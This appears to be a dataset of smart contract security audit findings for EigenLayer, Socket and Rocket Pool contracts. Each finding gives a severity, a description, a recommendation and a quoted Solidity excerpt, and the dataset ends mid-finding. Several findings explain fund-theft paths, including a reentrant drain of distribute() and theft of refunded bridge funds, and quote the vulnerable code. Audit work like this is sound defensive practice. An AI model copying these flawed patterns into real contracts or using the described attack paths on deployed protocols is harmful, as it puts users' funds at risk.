contracts must be reviewed and assessed separately on a case-by-case basis. As mentioned before, reentrancy protection can be challenging, especially in a multi-contract system.",,"```\\nfunction withdraw(address depositor, IERC20 token, uint256 amountShares)\\n external\\n virtual\\n override\\n onlyWhenNotPaused(PAUSED\\_WITHDRAWALS)\\n onlyStrategyManager\\n{\\n require(token == underlyingToken, ""StrategyBase.withdraw: Can only withdraw the strategy token"");\\n // copy `totalShares` value to memory, prior to any decrease\\n uint256 priorTotalShares = totalShares;\\n require(\\n amountShares <= priorTotalShares,\\n ""StrategyBase.withdraw: amountShares must be less than or equal to totalShares""\\n );\\n\\n // Calculate the value that `totalShares` will decrease to as a result of the withdrawal\\n uint256 updatedTotalShares = priorTotalShares - amountShares;\\n // check to avoid edge case where share rate can be massively inflated as a 'griefing' sort of attack\\n require(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES || updatedTotalShares == 0,\\n ""StrategyBase.withdraw: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES"");\\n // Actually decrease the `totalShares` value\\n totalShares = updatedTotalShares;\\n\\n /\\*\\*\\n \\* @notice calculation of amountToSend \\*mirrors\\* `sharesToUnderlying(amountShares)`, but is different since the `totalShares` has already\\n \\* been decremented. Specifically, notice how we use `priorTotalShares` here instead of `totalShares`.\\n \\*/\\n uint256 amountToSend;\\n if (priorTotalShares == amountShares) {\\n amountToSend = \\_tokenBalance();\\n } else {\\n amountToSend = (\\_tokenBalance() \\* amountShares) / priorTotalShares;\\n }\\n\\n underlyingToken.safeTransfer(depositor, amountToSend);\\n}\\n```\\n" +StrategyBase - Inflation Attack Prevention Can Lead to Stuck Funds,low,"As a defense against what has come to be known as inflation or donation attack in the context of ERC-4626, the `StrategyBase` contract - from which concrete strategy implementations are supposed to inherit - enforces that the amount of shares in existence for a particular strategy is always either 0 or at least a certain minimum amount that is set to 10^9. This mitigates inflation attacks, which require a small total supply of shares to be effective.\\n```\\nuint256 updatedTotalShares = totalShares + newShares;\\nrequire(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES,\\n ""StrategyBase.deposit: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES"");\\n```\\n\\n```\\n// Calculate the value that `totalShares` will decrease to as a result of the withdrawal\\nuint256 updatedTotalShares = priorTotalShares - amountShares;\\n// check to avoid edge case where share rate can be massively inflated as a 'griefing' sort of attack\\nrequire(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES || updatedTotalShares == 0,\\n ""StrategyBase.withdraw: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES"");\\n```\\n\\nThis particular approach has the downside that, in the worst case, a user may be unable to withdraw the underlying asset for up to 10^9 - 1 shares. While the extreme circumstances under which this can happen might be unlikely to occur in a realistic setting and, in many cases, the value of 10^9 - 1 shares may be negligible, this is not ideal.","It isn't easy to give a good general recommendation. None of the suggested mitigations are without a downside, and what's the best choice may also depend on the specific situation. We do, however, feel that alternative approaches that can't lead to stuck funds might be worth considering, especially for a default implementation.\\nOne option is internal accounting, i.e., the strategy keeps track of the number of underlying tokens it owns. It uses this number for conversion rate calculation instead of its balance in the token contract. This avoids the donation attack because sending tokens directly to the strategy will not affect the conversion rate. Moreover, this technique helps prevent reentrancy issues when the EigenLayer state is out of sync with the token contract's state. The downside is higher gas costs and that donating by just sending tokens to the contract is impossible; more specifically, if it happens accidentally, the funds are lost unless there's some special mechanism to recover them.\\nAn alternative approach with virtual shares and assets is presented here, and the document lists pointers to more discussions and proposed solutions.",,"```\\nuint256 updatedTotalShares = totalShares + newShares;\\nrequire(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES,\\n ""StrategyBase.deposit: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES"");\\n```\\n" +StrategyWrapper - Functions Shouldn't Be virtual (Out of Scope),low,"The `StrategyWrapper` contract is a straightforward strategy implementation and - as its NatSpec documentation explicitly states - is not designed to be inherited from:\\n```\\n/\\*\\*\\n \\* @title Extremely simple implementation of `IStrategy` interface.\\n \\* @author Layr Labs, Inc.\\n \\* @notice Simple, basic, ""do-nothing"" Strategy that holds a single underlying token and returns it on withdrawals.\\n \\* Assumes shares are always 1-to-1 with the underlyingToken.\\n \\* @dev Unlike `StrategyBase`, this contract is \\*not\\* designed to be inherited from.\\n \\* @dev This contract is expressly \\*not\\* intended for use with 'fee-on-transfer'-type tokens.\\n \\* Setting the `underlyingToken` to be a fee-on-transfer token may result in improper accounting.\\n \\*/\\ncontract StrategyWrapper is IStrategy {\\n```\\n\\nHowever, all functions in this contract are `virtual`, which only makes sense if inheriting from `StrategyWrapper` is possible.","Assuming the NatSpec documentation is correct, and no contract should inherit from `StrategyWrapper`, remove the `virtual` keyword from all function definitions. Otherwise, fix the documentation.\\nRemark\\nThis contract is out of scope, and this finding is only included because we noticed it accidentally. This does not mean we have reviewed the contract or other out-of-scope files.",,"```\\n/\\*\\*\\n \\* @title Extremely simple implementation of `IStrategy` interface.\\n \\* @author Layr Labs, Inc.\\n \\* @notice Simple, basic, ""do-nothing"" Strategy that holds a single underlying token and returns it on withdrawals.\\n \\* Assumes shares are always 1-to-1 with the underlyingToken.\\n \\* @dev Unlike `StrategyBase`, this contract is \\*not\\* designed to be inherited from.\\n \\* @dev This contract is expressly \\*not\\* intended for use with 'fee-on-transfer'-type tokens.\\n \\* Setting the `underlyingToken` to be a fee-on-transfer token may result in improper accounting.\\n \\*/\\ncontract StrategyWrapper is IStrategy {\\n```\\n" +StrategyBase - Inheritance-Related Issues,low,"A. The `StrategyBase` contract defines `view` functions that, given an amount of shares, return the equivalent amount of tokens (sharesToUnderlyingView) and vice versa (underlyingToSharesView). These two functions also have non-view counterparts: `sharesToUnderlying` and `underlyingToShares`, and their NatSpec documentation explicitly states that they should be allowed to make state changes. Given the scope of this engagement, it is unclear if these non-view versions are needed, but assuming they are, this does currently not work as intended.\\nFirst, the interface `IStrategy` declares `underlyingToShares` as `view` (unlike sharesToUnderlying). This means overriding this function in derived contracts is impossible without the `view` modifier. Hence, in `StrategyBase` - which implements the `IStrategy` interface - this (virtual) function is (and has to be) `view`. The same applies to overridden versions of this function in contracts inherited from `StrategyBase`.\\n```\\n/\\*\\*\\n \\* @notice Used to convert an amount of underlying tokens to the equivalent amount of shares in this strategy.\\n \\* @notice In contrast to `underlyingToSharesView`, this function \\*\\*may\\*\\* make state modifications\\n \\* @param amountUnderlying is the amount of `underlyingToken` to calculate its conversion into strategy shares\\n \\* @dev Implementation for these functions in particular may vary signifcantly for different strategies\\n \\*/\\nfunction underlyingToShares(uint256 amountUnderlying) external view returns (uint256);\\n```\\n\\n```\\n/\\*\\*\\n \\* @notice Used to convert an amount of underlying tokens to the equivalent amount of shares in this strategy.\\n \\* @notice In contrast to `underlyingToSharesView`, this function \\*\\*may\\*\\* make state modifications\\n \\* @param amountUnderlying is the amount of `underlyingToken` to calculate its conversion into strategy shares\\n \\* @dev Implementation for these functions in particular may vary signifcantly for different strategies\\n \\*/\\nfunction underlyingToShares(uint256 amountUnderlying) external view virtual returns (uint256) {\\n return underlyingToSharesView(amountUnderlying);\\n}\\n```\\n\\nAs mentioned above, the `sharesToUnderlying` function does not have the `view` modifier in the interface `IStrategy`. However, the overridden (and virtual) version in `StrategyBase` does, which means again that overriding this function in contracts inherited from `StrategyBase` is impossible without the `view` modifier.\\n```\\n/\\*\\*\\n \\* @notice Used to convert a number of shares to the equivalent amount of underlying tokens for this strategy.\\n \\* @notice In contrast to `sharesToUnderlyingView`, this function \\*\\*may\\*\\* make state modifications\\n \\* @param amountShares is the amount of shares to calculate its conversion into the underlying token\\n \\* @dev Implementation for these functions in particular may vary signifcantly for different strategies\\n \\*/\\nfunction sharesToUnderlying(uint256 amountShares) public view virtual override returns (uint256) {\\n return sharesToUnderlyingView(amountShares);\\n}\\n```\\n\\nB. The `initialize` function in the `StrategyBase` contract is not virtual, which means the name will not be available in derived contracts (unless with different parameter types). It also has the `initializer` modifier, which is unavailable in concrete strategies inherited from `StrategyBase`.","A. If state-changing versions of the conversion functions are needed, the `view` modifier has to be removed from `IStrategy.underlyingToShares`, `StrategyBase.underlyingToShares`, and `StrategyBase.sharesToUnderlying`. They should be removed entirely from the interface and base contract if they're not needed.\\nB. Consider making the `StrategyBase` contract `abstract`, maybe give the `initialize` function a more specific name such as `_initializeStrategyBase`, change its visibility to `internal`, and use the `onlyInitializing` modifier instead of `initializer`.",,"```\\n/\\*\\*\\n \\* @notice Used to convert an amount of underlying tokens to the equivalent amount of shares in this strategy.\\n \\* @notice In contrast to `underlyingToSharesView`, this function \\*\\*may\\*\\* make state modifications\\n \\* @param amountUnderlying is the amount of `underlyingToken` to calculate its conversion into strategy shares\\n \\* @dev Implementation for these functions in particular may vary signifcantly for different strategies\\n \\*/\\nfunction underlyingToShares(uint256 amountUnderlying) external view returns (uint256);\\n```\\n" +StrategyManager - Cross-Chain Replay Attacks After Chain Split Due to Hard-Coded DOMAIN_SEPARATOR,low,"A. The `StrategyManager` contract allows stakers to deposit into and withdraw from strategies. A staker can either deposit themself or have someone else do it on their behalf, where the latter requires an EIP-712-compliant signature. The EIP-712 domain separator is computed in the `initialize` function and stored in a state variable for later retrieval:\\n```\\n/// @notice EIP-712 Domain separator\\nbytes32 public DOMAIN\\_SEPARATOR;\\n```\\n\\n```\\nfunction initialize(address initialOwner, address initialStrategyWhitelister, IPauserRegistry \\_pauserRegistry, uint256 initialPausedStatus, uint256 \\_withdrawalDelayBlocks)\\n external\\n initializer\\n{\\n DOMAIN\\_SEPARATOR = keccak256(abi.encode(DOMAIN\\_TYPEHASH, bytes(""EigenLayer""), block.chainid, address(this)));\\n```\\n\\nOnce set in the `initialize` function, the value can't be changed anymore. In particular, the chain ID is “baked into” the `DOMAIN_SEPARATOR` during initialization. However, it is not necessarily constant: In the event of a chain split, only one of the resulting chains gets to keep the original chain ID, and the other should use a new one. With the current approach to compute the `DOMAIN_SEPARATOR` during initialization, store it, and then use the stored value for signature verification, a signature will be valid on both chains after a split - but it should not be valid on the chain with the new ID. Hence, the domain separator should be computed dynamically.\\nB. The `name` in the `EIP712Domain` is of type string:\\n```\\nbytes32 public constant DOMAIN\\_TYPEHASH =\\n keccak256(""EIP712Domain(string name,uint256 chainId,address verifyingContract)"");\\n```\\n\\nWhat's encoded when the domain separator is computed is bytes(""EigenLayer""):\\n```\\nDOMAIN\\_SEPARATOR = keccak256(abi.encode(DOMAIN\\_TYPEHASH, bytes(""EigenLayer""), block.chainid, address(this)));\\n```\\n\\nAccording to EIP-712,\\nThe dynamic values `bytes` and `string` are encoded as a `keccak256` hash of their contents.\\nHence, `bytes(""EigenLayer"")` should be replaced with `keccak256(bytes(""EigenLayer""))`.\\nC. The `EIP712Domain` does not include a version string:\\n```\\nbytes32 public constant DOMAIN\\_TYPEHASH =\\n keccak256(""EIP712Domain(string name,uint256 chainId,address verifyingContract)"");\\n```\\n\\nThat is allowed according to the specification. However, given that most, if not all, projects, as well as OpenZeppelin's EIP-712 implementation, do include a version string in their `EIP712Domain`, it might be a pragmatic choice to do the same, perhaps to avoid potential incompatibilities.","Individual recommendations have been given above. Alternatively, you might want to utilize OpenZeppelin's `EIP712Upgradeable` library, which will take care of these issues. Note that some of these changes will break existing signatures.",,```\\n/// @notice EIP-712 Domain separator\\nbytes32 public DOMAIN\\_SEPARATOR;\\n```\\n +StrategyManagerStorage - Miscalculated Gap Size,low,"Upgradeable contracts should have a “gap” of unused storage slots at the end to allow for adding state variables when the contract is upgraded. The convention is to have a gap whose size adds up to 50 with the used slots at the beginning of the contract's storage.\\nIn `StrategyManagerStorage`, the number of consecutively used storage slots is 10:\\n`DOMAIN_SEPARATOR`\\n`nonces`\\n`strategyWhitelister`\\n`withdrawalDelayBlocks`\\n`stakerStrategyShares`\\n`stakerStrategyList`\\n`withdrawalRootPending`\\n`numWithdrawalsQueued`\\n`strategyIsWhitelistedForDeposit`\\n`beaconChainETHSharesToDecrementOnWithdrawal`\\nHowever, the gap size in the storage contract is 41:\\n```\\nuint256[41] private \\_\\_gap;\\n```\\n","If you don't have to maintain compatibility with an existing deployment, we recommend reducing the storage gap size to 40. Otherwise, we recommend adding a comment explaining that, in this particular case, the gap size and the used storage slots should add up to 51 instead of 50 and that this invariant has to be maintained in future versions of this contract.",,```\\nuint256[41] private \\_\\_gap;\\n```\\n +Funds Refunded From Celer Bridge Might Be Stolen,high,"```\\nif (!router.withdraws(transferId)) {\\n router.withdraw(\\_request, \\_sigs, \\_signers, \\_powers);\\n}\\n```\\n\\nFrom the point of view of the Celer bridge, the initial depositor of the tokens is the `SocketGateway`. As a consequence, the Celer contract transfers the tokens to be refunded to the gateway. The gateway is then in charge of forwarding the tokens to the initial depositor. To achieve this, it keeps a mapping of unique transfer IDs to depositor addresses. Once a refund is processed, the corresponding address in the mapping is reset to the zero address.\\nLooking at the `withdraw` function of the Celer pool, we see that for some tokens, it is possible that the reimbursement will not be processed directly, but only after some delay. From the gateway point of view, the reimbursement will be marked as successful, and the address of the original sender corresponding to this transfer ID will be reset to address(0).\\n```\\nif (delayThreshold > 0 && wdmsg.amount > delayThreshold) {\\n _addDelayedTransfer(wdId, wdmsg.receiver, wdmsg.token, wdmsg. // <--- here\\n} else {\\n _sendToken(wdmsg.receiver, wdmsg.token, wdmsg.\\n}\\n```\\n\\nIt is then the responsibility of the user, once the locking delay has passed, to call another function to claim the tokens. Unfortunately, in our case, this means that the funds will be sent back to the gateway contract and not to the original sender. Because the gateway implements `rescueEther`, and `rescueFunds` functions, the admin might be able to send the funds back to the user. However, this requires manual intervention and breaks the trustlessness assumptions of the system. Also, in that case, there is no easy way to trace back the original address of the sender, that corresponds to this refund.\\nHowever, there is an additional issue that might allow an attacker to steal some funds from the gateway. Indeed, when claiming the refund, if it is in ETH, the gateway will have some balance when the transaction completes. Any user can then call any function that consumes the gateway balance, such as the `swapAndBridge` from `CelerImpl`, to steal the refunded ETH. That is possible as the function relies on a user-provided amount as an input, and not on `msg.value`. Additionally, if the refund is an ERC-20, an attacker can steal the funds by calling `bridgeAfterSwap` or `swapAndBridge` from the `Stargate` or `Celer` routes with the right parameters.\\n```\\nfunction bridgeAfterSwap(\\n uint256 amount,\\n bytes calldata bridgeData\\n) external payable override {\\n CelerBridgeData memory celerBridgeData = abi.decode(\\n bridgeData,\\n (CelerBridgeData)\\n );\\n```\\n\\n```\\nfunction swapAndBridge(\\n uint32 swapId,\\n bytes calldata swapData,\\n StargateBridgeDataNoToken calldata stargateBridgeData\\n```\\n\\nNote that this violates the security assumption: “The contracts are not supposed to hold any funds post-tx execution.”",Make sure that `CelerImpl` supports also the delayed withdrawals functionality and that withdrawal requests are deleted only if the receiver has received the withdrawal in a single transaction.,,"```\\nif (!router.withdraws(transferId)) {\\n router.withdraw(\\_request, \\_sigs, \\_signers, \\_powers);\\n}\\n```\\n" +Calls Made to Non-Existent/Removed Routes or Controllers Will Not Result in Failure,high,"This issue was found in commit hash `a8d0ad1c280a699d88dc280d9648eacaf215fb41`.\\nIn the Ethereum Virtual Machine (EVM), `delegatecall` will succeed for calls to externally owned accounts and more specifically to the zero address, which presents a potential security risk. We have identified multiple instances of `delegatecall` being used to invoke smart contract functions.\\nThis, combined with the fact that routes can be removed from the system by the owner of the `SocketGateway` contract using the `disableRoute` function, makes it possible for the user's funds to be lost in case of an `executeRoute` transaction (for instance) that's waiting in the mempool is eventually being front-ran by a call to `disableRoute`.\\n```\\n(bool success, bytes memory result) = addressAt(routeId).delegatecall(\\n```\\n\\n```\\n.delegatecall(swapData);\\n```\\n\\n```\\n.delegatecall(swapData);\\n```\\n\\n```\\n.delegatecall(swapData);\\n```\\n\\n```\\n.delegatecall(data);\\n```\\n\\nEven after the upgrade to commit hash `d0841a3e96b54a9d837d2dba471aa0946c3c8e7b`, the following bug is still present:\\nTo optimize gas usage, the `addressAt` function in `socketGateway` uses a binary search in a hard-coded table to resolve a `routeID` (routeID <= 512) to a contract address. This is made possible thanks to the factory using the `CREATE2` pattern. This allows to pre-compute future addresses of contracts before they are deployed. In case the `routeID` is strictly greater than 512, `addressAt` falls back to fetching the address from a state mapping (routes).\\nThe new commit hash adds a check to make sure that the call to the `addressAt` function reverts in case a `routeID` is not present in the `routes` mapping. This prevents delegate-calling to non-existent addresses in various places of the code. However, this does not solve the issue for the hard-coded route addresses (i.e., `routeID` <= 512). In that case, the `addressAt` function still returns a valid route contract address, despite the contract not being deployed yet. This will result in a successful `delegatecall` later in the code and might lead to various side-effects.\\n```\\nfunction addressAt(uint32 routeId) public view returns (address) {\\n if (routeId < 513) {\\n if (routeId < 257) {\\n if (routeId < 129) {\\n if (routeId < 65) {\\n if (routeId < 33) {\\n if (routeId < 17) {\\n if (routeId < 9) {\\n if (routeId < 5) {\\n if (routeId < 3) {\\n if (routeId == 1) {\\n return\\n 0x822D4B4e63499a576Ab1cc152B86D1CFFf794F4f;\\n } else {\\n return\\n 0x822D4B4e63499a576Ab1cc152B86D1CFFf794F4f;\\n }\\n } else {\\n```\\n\\n```\\nif (routes[routeId] == address(0)) revert ZeroAddressNotAllowed();\\nreturn routes[routeId];\\n```\\n","Consider adding a check to validate that the callee of a `delegatecall` is indeed a contract, you may refer to the Address library by OZ.",,"```\\n(bool success, bytes memory result) = addressAt(routeId).delegatecall(\\n```\\n" +Owner Can Add Arbitrary Code to Be Executed From the SocketGateway Contract,medium,"The Socket system is managed by the `SocketGateway` contract that maintains all routes and controller addresses within its state. There, the address with the `Owner` role of the `SocketGateway` contract can add new routes and controllers that would have a `delegatecall()` executed upon them from the `SocketGateway` so user transactions can go through the logic required for the bridge, swap, or any other solution integrated with Socket. These routes and controllers would then have arbitrary code that is entirely up to the `Owner`, though users are not required to go through any specific routes and can decide which routes to pick.\\nSince these routes are called via `delegatecall()`, they don't hold any storage variables that would be used in the Socket systems. However, as Socket aggregates more solutions, unexpected complexities may arise that could require storing and accessing variables through additional contracts. Those contracts would be access control protected to only have the `SocketGateway` contract have the privileges to modify its variables.\\nThis together with the `Owner` of the `SocketGateway` being able to add routes with arbitrary code creates an attack vector where a compromised address with `Owner` privileges may add a route that would contain code that exploits the special privileges assigned to the `SocketGateway` contract for their benefit.\\nFor example, the Celer bridge needs extra logic to account for its refund mechanism, so there is an additional `CelerStorageWrapper` contract that maintains a mapping between individual bridge transfer transactions and their associated msg.sender:\\n```\\ncelerStorageWrapper.setAddressForTransferId(transferId, msg.sender);\\n```\\n\\n```\\n/\\*\\*\\n \\* @title CelerStorageWrapper\\n \\* @notice handle storageMappings used while bridging ERC20 and native on CelerBridge\\n \\* @dev all functions ehich mutate the storage are restricted to Owner of SocketGateway\\n \\* @author Socket dot tech.\\n \\*/\\ncontract CelerStorageWrapper {\\n```\\n\\nConsequently, this contract has access-protected functions that may only be called by the SocketGateway to set and delete the transfer IDs:\\n```\\nfunction setAddressForTransferId(\\n```\\n\\n```\\nfunction deleteTransferId(bytes32 transferId) external {\\n```\\n\\nA compromised `Owner` of SocketGateway could then create a route that calls into the `CelerStorageWrapper` contract and updates the transfer IDs associated addresses to be under their control via `deleteTransferId()` and `setAddressForTransferId()` functions. This could create a significant drain of user funds, though, it depends on a compromised privileged `Owner` address.","Although it may indeed be unlikely, for aggregating solutions it is especially important to try and minimize compromised access issues. As future solutions require more complexity, consider architecting their integrations in such a way that they require as few administrative and SocketGateway-initiated transactions as possible. Through conversations with the Socket team, it appears that solutions such as timelocks on adding new routes are being considered as well, which would help catch the problem before it appears as well.",,"```\\ncelerStorageWrapper.setAddressForTransferId(transferId, msg.sender);\\n```\\n" +Dependency on Third-Party APIs to Create the Right Payload,medium,"The Socket system of routes and controllers integrates swaps, bridges, and potentially other solutions that are vastly different from each other. The function arguments that are required to execute them may often seem like a black box of a payload for a typical end user. In fact, even when users explicitly provide a destination `token` with an associated `amount` for a swap, these arguments themselves might not even be fully (or at all) used in the route itself. Instead, often the routes and controllers accept a `bytes` payload that contains all the necessary data for its action. These data payloads are generated off-chain, often via centralized APIs provided by the integrated systems themselves, which is understandable in isolation as they have to be generated somewhere at some point. However, the provided `bytes` do not get checked for their correctness or matching with the other arguments that the user explicitly provided. Even the events that get emitted refer to the individual arguments of functions as opposed to what actually was being used to execute the logic.\\nFor example, the implementation route for the 1inch swaps explicitly asks the user to provide `fromToken`, `toToken`, `amount`, and `receiverAddress`, however only `fromToken` and `amount` are used meaningfully to transfer the `amount` to the SocketGateway and approve the `fromToken` to be spent by the 1inch contract. Everything else is dictated by `swapExtraData`, including even the true `amount` that is getting swapped. A mishap in the API providing this data payload could cause much less of a token `amount` to be swapped, a wrong address to receive the swap, and even the wrong destination token to return.\\n```\\n// additional data is generated in off-chain using the OneInch API which takes in\\n// fromTokenAddress, toTokenAddress, amount, fromAddress, slippage, destReceiver, disableEstimate\\n(bool success, bytes memory result) = ONEINCH\\_AGGREGATOR.call(\\n swapExtraData\\n);\\n```\\n\\nEven the event at the end of the transaction partially refers to the explicitly provided arguments instead of those that actually facilitated the execution of logic\\n```\\nemit SocketSwapTokens(\\n fromToken,\\n toToken,\\n returnAmount,\\n amount,\\n OneInchIdentifier,\\n receiverAddress\\n);\\n```\\n\\nAs Socket aggregates other solutions, it naturally incurs the trust assumptions and risks associated with its integrations. In some ways, they even stack on top of each other, especially in those Socket functions that batch several routes together - all of them and their associated API calls need to return the correct payloads. So, there is an opportunity to minimize these risks by introducing additional checks into the contracts that would verify the correctness of the payloads that are passed over to the routes and controllers. In fact, creating these payloads within the contracts would allow other systems to integrate Socket more simpler as they could just call the functions with primary logical arguments such as the source token, destination token, and amount.","Consider allocating additional checks within the route implementations that ensure that the explicitly passed arguments match what is being sent for execution to the integrated solutions, like in the above example with the 1inch implementation.",,"```\\n// additional data is generated in off-chain using the OneInch API which takes in\\n// fromTokenAddress, toTokenAddress, amount, fromAddress, slippage, destReceiver, disableEstimate\\n(bool success, bytes memory result) = ONEINCH\\_AGGREGATOR.call(\\n swapExtraData\\n);\\n```\\n" +NativeOptimismImpl - Events Will Not Be Emitted in Case of Non-Native Tokens Bridging,medium,"In the case of the usage of non-native tokens by users, the `SocketBridge` event will not be emitted since the code will return early.\\n```\\nfunction bridgeAfterSwap(\\n```\\n\\n```\\nfunction swapAndBridge(\\n```\\n\\n```\\nfunction bridgeERC20To(\\n```\\n",Make sure that the `SocketBridge` event is emitted for non-native tokens as well.,,```\\nfunction bridgeAfterSwap(\\n```\\n +Inconsistent Comments,low,"Some of the contracts in the code have incorrect developer comments annotated for them. This could create confusion for future readers of this code that may be trying to maintain, audit, update, fork, integrate it, and so on.\\n```\\n/\\*\\*\\n \\* @notice function to bridge tokens after swap. This is used after swap function call\\n \\* @notice This method is payable because the caller is doing token transfer and briding operation\\n \\* @dev for usage, refer to controller implementations\\n \\* encodedData for bridge should follow the sequence of properties in Stargate-BridgeData struct\\n \\* @param swapId routeId for the swapImpl\\n \\* @param swapData encoded data for swap\\n \\* @param stargateBridgeData encoded data for StargateBridgeData\\n \\*/\\nfunction swapAndBridge(\\n```\\n\\nThis is the same comment as `bridgeAfterSwap`, whereas it instead does swapping and bridging together\\n```\\n/\\*\\*\\n \\* @notice function to store the transferId and message-sender of a bridging activity\\n \\* @notice This method is payable because the caller is doing token transfer and briding operation\\n \\* @dev for usage, refer to controller implementations\\n \\* encodedData for bridge should follow the sequence of properties in CelerBridgeData struct\\n \\* @param transferId transferId generated during the bridging of ERC20 or native on CelerBridge\\n \\* @param transferIdAddress message sender who is making the bridging on CelerBridge\\n \\*/\\nfunction setAddressForTransferId(\\n```\\n\\nThis comment refers to a payable property of this function when it isn't.\\n```\\n/\\*\\*\\n \\* @notice function to store the transferId and message-sender of a bridging activity\\n \\* @notice This method is payable because the caller is doing token transfer and briding operation\\n \\* @dev for usage, refer to controller implementations\\n \\* encodedData for bridge should follow the sequence of properties in CelerBridgeData struct\\n \\* @param transferId transferId generated during the bridging of ERC20 or native on CelerBridge\\n \\*/\\nfunction deleteTransferId(bytes32 transferId) external {\\n```\\n\\nThis comment is copied from the above function when it does the opposite of storing - it deletes the `transferId`",Adjust comments so they reflect what the functions are actually doing.,,"```\\n/\\*\\*\\n \\* @notice function to bridge tokens after swap. This is used after swap function call\\n \\* @notice This method is payable because the caller is doing token transfer and briding operation\\n \\* @dev for usage, refer to controller implementations\\n \\* encodedData for bridge should follow the sequence of properties in Stargate-BridgeData struct\\n \\* @param swapId routeId for the swapImpl\\n \\* @param swapData encoded data for swap\\n \\* @param stargateBridgeData encoded data for StargateBridgeData\\n \\*/\\nfunction swapAndBridge(\\n```\\n" +Unused Error Codes.,low,"`error RouteAlreadyExist();`\\n`error ContractContainsNoCode();`\\n`error ControllerAlreadyExist();`\\n`error ControllerAddressIsZero();`\\nIt seems that they were created as errors that may have been expected to occur during the early stages of development, but the resulting architecture doesn't seem to have a place for them currently.\\n```\\nerror RouteAlreadyExist();\\nerror SwapFailed();\\nerror UnsupportedInterfaceId();\\nerror ContractContainsNoCode();\\nerror InvalidCelerRefund();\\nerror CelerAlreadyRefunded();\\nerror ControllerAlreadyExist();\\nerror ControllerAddressIsZero();\\n```\\n",Resolution\\nRemediated as per the client team in SocketDotTech/socket-ll-contracts#148.\\nConsider revisiting these errors and identifying whether they need to remain or can be removed.,,```\\nerror RouteAlreadyExist();\\nerror SwapFailed();\\nerror UnsupportedInterfaceId();\\nerror ContractContainsNoCode();\\nerror InvalidCelerRefund();\\nerror CelerAlreadyRefunded();\\nerror ControllerAlreadyExist();\\nerror ControllerAddressIsZero();\\n```\\n +Inaccurate Interface.,low,"`ISocketGateway` implies a `bridge(uint32 routeId, bytes memory data)` function, but there is no socket contract with a function like that, including the `SocketGateway` contract.\\n```\\nfunction bridge(\\n uint32 routeId,\\n bytes memory data\\n) external payable returns (bytes memory);\\n```\\n",Adjust the interface.,,"```\\nfunction bridge(\\n uint32 routeId,\\n bytes memory data\\n) external payable returns (bytes memory);\\n```\\n" +Validate Array Length Matching Before Execution to Avoid Reverts,low,"The Socket system not only aggregates different solutions via its routes and controllers but also allows to batch calls between them into one transaction. For example, a user may call swaps between several DEXs and then perform a bridge transfer.\\nAs a result, the `SocketGateway` contract has many functions that accept multiple arrays that contain the necessary data for execution in their respective routes. However, these arrays need to be of the same length because individual elements in the arrays are intended to be matched at the same indices:\\n```\\nfunction executeRoutes(\\n uint32[] calldata routeIds,\\n bytes[] calldata dataItems,\\n bytes[] calldata eventDataItems\\n) external payable {\\n uint256 routeIdslength = routeIds.length;\\n for (uint256 index = 0; index < routeIdslength; ) {\\n (bool success, bytes memory result) = addressAt(routeIds[index])\\n .delegatecall(dataItems[index]);\\n\\n if (!success) {\\n assembly {\\n revert(add(result, 32), mload(result))\\n }\\n }\\n\\n emit SocketRouteExecuted(routeIds[index], eventDataItems[index]);\\n\\n unchecked {\\n ++index;\\n }\\n }\\n}\\n```\\n\\nNote that in the above example function, all 3 different calldata arrays `routeIds`, `dataItems`, and `eventDataItems` were utilizing the same `index` to retrieve the correct element. A common practice in such cases is to confirm that the sizes of the arrays match before continuing with the execution of the rest of the transaction to avoid costly reverts that could happen due to “Index out of bounds” error.\\nDue to the aggregating and batching nature of the Socket system that may have its users rely on 3rd party offchain APIs to construct these array payloads, such as from APIs of the systems that Socket is integrating, a mishap in just any one of them could cause this issue.",Implement a check on the array lengths so they match.,,"```\\nfunction executeRoutes(\\n uint32[] calldata routeIds,\\n bytes[] calldata dataItems,\\n bytes[] calldata eventDataItems\\n) external payable {\\n uint256 routeIdslength = routeIds.length;\\n for (uint256 index = 0; index < routeIdslength; ) {\\n (bool success, bytes memory result) = addressAt(routeIds[index])\\n .delegatecall(dataItems[index]);\\n\\n if (!success) {\\n assembly {\\n revert(add(result, 32), mload(result))\\n }\\n }\\n\\n emit SocketRouteExecuted(routeIds[index], eventDataItems[index]);\\n\\n unchecked {\\n ++index;\\n }\\n }\\n}\\n```\\n" +Destroyed Routes Eth Balances Will Be Left Locked in SocketDeployFactory,low,"`SocketDeployFactory.destroy` calls the `killme` function which in turn self-destructs the route and sends back any eth to the factory contract. However, these funds can not be claimed from the `SocketDeployFactory` contract.\\n```\\nfunction destroy(uint256 routeId) external onlyDisabler {\\n```\\n",Make sure that these funds can be claimed.,,```\\nfunction destroy(uint256 routeId) external onlyDisabler {\\n```\\n +RocketNodeDistributorDelegate - Reentrancy in distribute() allows node owner to drain distributor funds,high,"The `distribute()` function distributes the contract's balance between the node operator and the user. The node operator is returned their initial collateral, including a fee. The rest is returned to the RETH token contract as user collateral.\\nAfter determining the node owner's share, the contract transfers `ETH` to the node withdrawal address, which can be the configured withdrawal address or the node address. Both addresses may potentially be a malicious contract that recursively calls back into the `distribute()` function to retrieve the node share multiple times until all funds are drained from the contract. The `distribute()` function is not protected against reentrancy:\\n```\\n/// @notice Distributes the balance of this contract to its owners\\nfunction distribute() override external {\\n // Calculate node share\\n uint256 nodeShare = getNodeShare();\\n // Transfer node share\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n (bool success,) = withdrawalAddress.call{value : nodeShare}("""");\\n require(success);\\n // Transfer user share\\n uint256 userShare = address(this).balance;\\n address rocketTokenRETH = rocketStorage.getAddress(rocketTokenRETHKey);\\n payable(rocketTokenRETH).transfer(userShare);\\n // Emit event\\n emit FeesDistributed(nodeAddress, userShare, nodeShare, block.timestamp);\\n}\\n```\\n\\nWe also noticed that any address could set a withdrawal address as there is no check for the caller to be a registered node. In fact, the caller can be the withdrawal address or node operator.\\n```\\n// Set a node's withdrawal address\\nfunction setWithdrawalAddress(address \\_nodeAddress, address \\_newWithdrawalAddress, bool \\_confirm) external override {\\n // Check new withdrawal address\\n 